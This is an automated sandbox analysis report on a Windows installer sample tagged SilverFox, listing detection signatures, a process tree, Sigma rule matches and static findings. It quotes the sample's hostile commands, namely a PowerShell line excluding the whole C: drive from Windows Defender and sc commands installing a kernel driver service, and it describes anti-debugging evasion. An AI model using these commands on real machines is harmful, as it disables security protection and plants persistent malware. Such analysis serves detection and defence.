Windows Analysis Report
#U5b89#U88c5#U52a9#U624b2.0.7.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b2.0.7.exe
(renamed because original name is a hash value)
Original sample name: 2.0.7.exe
Analysis ID: 1580396
MD5: d4c8420bea7c19a44ab6ad71fd8dde34
SHA1: 32357f3fbd634ec73d11a2322e317b6c2d50e1b4
SHA256: 25147cff7a4bd1554ca3d0fa3549982132be1c59f75881786e5457ff3128ff6a
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b2.0.7.exe (PID: 2716 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" MD5: D4C8420BEA7C19A44AB6AD71FD8DDE34)
    • #U5b89#U88c5#U52a9#U624b2.0.7.tmp (PID: 6000 cmdline: "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" MD5: E4680C0AB69900E6A19A0AA38BD54AAD)
      • powershell.exe (PID: 6648 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4676 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b2.0.7.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT MD5: D4C8420BEA7C19A44AB6AD71FD8DDE34)
        • #U5b89#U88c5#U52a9#U624b2.0.7.tmp (PID: 6664 cmdline: "C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$20478,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT MD5: E4680C0AB69900E6A19A0AA38BD54AAD)
          • 7zr.exe (PID: 5596 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6172 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 2820 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7060 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1292 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6532 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5964 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1272 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5488 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6580 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 412 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1488 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5856 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5972 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2920 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6640 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6524 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3712 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6656 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5948 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1848 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5776 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5972 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2448 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4092 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6532 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5512 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3116 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5776 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5964 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4092 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6292 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1276 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, ParentProcessId: 6000, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6648, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7060, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 1292, ProcessName: sc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, ParentProcessId: 6000, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6648, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7060, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 1292, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, ParentProcessId: 6000, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6648, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc | ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vac | ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vac | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 85.0% probability
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2122040104.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2121917091.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9BB430 FindFirstFileA,FindClose,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DA6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DA7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000003.2075102858.0000000004240000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr | Strings found in binary or memory:
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  • http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  • http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  • http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  • http://ocsp.digicert.com0A
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0H
  • http://ocsp.digicert.com0I
  • http://ocsp.digicert.com0X
  • http://www.digicert.com/CPS0
  • http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065280017.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065641088.000000007ECFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000000.2067287826.0000000000A21000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000000.2087886960.000000000117D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.dr | Strings found in binary or memory:
  • https://www.innosetup.com/
  • https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process information set: 01 00 00 00

System Summary

barindex
Source: update.vac.1.dr | Static PE information: section name: .#.q
Source: hrsw.vbc.6.dr | Static PE information: section name: .#.q
Source: update.vac.6.dr | Static PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9C5690 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C843886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C843C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C843D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C843D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C8439CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9C62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C843A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C841950 CreateFileA,DeviceIoControl,CloseHandle
